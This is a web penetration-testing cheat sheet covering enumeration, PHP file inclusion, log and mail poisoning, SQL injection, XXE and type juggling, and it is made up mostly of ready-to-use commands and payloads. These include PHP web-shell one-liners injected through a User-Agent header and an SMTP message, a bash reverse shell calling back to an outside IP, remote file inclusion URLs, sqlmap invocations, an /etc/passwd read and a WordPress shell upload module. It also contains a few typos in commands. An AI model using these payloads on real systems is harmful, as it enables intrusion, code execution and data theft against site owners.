Table of Contents
General Check List
Initial Steps
- Security headers check -
securityheaders.com - SSL Cipher Strength -
nmap --script=ssl-enum-ciphers -p443 <domain> - Check login js code if possible. Look for owasp top 10 vulns.
Cookies.set("name", "value") is a typical vuln. Just set cookie to any value and refresh the page.
With Unprivileged User Account
- Check out what the user can do, what he can access, what things he can change
OWASP's Guide
- Follow OWASP's guide - OWASP Check List Portal
HeartBleed
If it is old linux version, like Ubuntu Precise released in 2012-2014, check HeartBleed.
# check with nmap
nmap --scirpt vuln <target>
# check with sslyze
sslyze --heartbleed <target>Enumeration
BurpSuite
Target Site map
Dirbuster
dirbuster -u -v -u <URL> -e <extensions> -l <wordlist> -r <report-location>Gobuster
gobuster dir|dns <URL> -v -t <threads> -w <wordlist> -x <php,txt,bak>Dirsearch
dirsearch.py -u <URL> -e <extensions> -t <threads> -c <cookies> --proxy=<proxy>Wfuzz
wfuzz -c -v --hc <status-code> -w <wordlist> <URL>/FUZZ/*PHP Info Page
Check php info page to see if file upload is on.
PHP Filter
If there is file inclusion, check file source with the following.
GET /example.php?file=php://filter/convert.base64-encode/resource=<file>PHP Remote File Inclusion
GET /example.php?file=http://ip/file
GET /example.php?file=ftp://ip/file
GET /example.php?file=expect://ip/filePHP Log Poisoning
Apache's got two log files, httpd-access.log and httpd-error.log. The access log will log every query, with user agent included in the log file. And, user agent can be modified to contain malicious php code and get code execution.
User Agent: <?php system($_REQUEST['ce']); ?>Wpscan
wpscan --rua -e ap --url <URL> --passwords <passfile>Other Tools
Foothold
Identity Brute Forcing
- Feature:
URL contains parameters used for user role identification - Example:
http://example.com/admin.php?content=Billing&id=1 - Handle:
BurpSuite Sniper attack
SQL Injection - URL
- Feature:
URL with query parameters attached, and you've got a cookie from the site - Example:
http://example.com/index.php?search=something - Handle:
sqlmap -u 'http://10.10.10.46/dashboard.php?search=a' --cookie="PHPSESSID=73jv7pdmjsv7dsspoqtnlv66ls",sqlmap -r <req-file> -p pass --dbms mysql --level 4 --risk 3
SQL Injection - Web Form
- Features: Query not filtering user input
- Example: Insert a single quote or double quote, if no error info, then it is vulnerable to sql injection
- Handle:
'or''=''--
Directory Traversal
- Features: Access to any file that you have permission to read on the machine
- Example:
http://example.com/index.php?file=../../../../etc/passwd - Handle: Upload a reverse shell and execute
XXE Injection
- Features: Inject arbitrary code into xml post entity
- Example:
<?xml version=”1.0″ ?><tag></tag> - Handle:
<!DOCTYPE foo [<!ENTITY xxe SYSTEM “file:///etc/passwd” >]><tag>&xxe;</tag>
Type Juggling
- Features: Misuse of
strcmp()function and==operator, cause login bypass - Example:
strcmp($password, $_POST['password'] == 0) - Handle: Intercept the request and edit username and password to arrays -
username[]=test&password[]=test
LFI
If port 25 is open, you can connect to the port, and send an email with php code execution in it to the service user, then use LFI to get code execution.
telnet ip 25
EHLO example.local.domain
VRFY user-on-server@locaohost
mail from:whatever-email-addr
rcpt to:user-on-server@localhost
data
<?php echo system($_REQUEST['ce']); ?>
.
quitLFI include ../../../../../../var/html/mail/<user>&action?ce=whoami
And, put something like bash -i>& /dev/tcp/10.10.15.5/9999 0>&1, don't forget to use Ctrl-U to encode it if in Burp.
WP Admin Shell Upload
- Feature:
Admin account and password obtained - Handle:
metasploit wp_admin_shell_upload module exploit
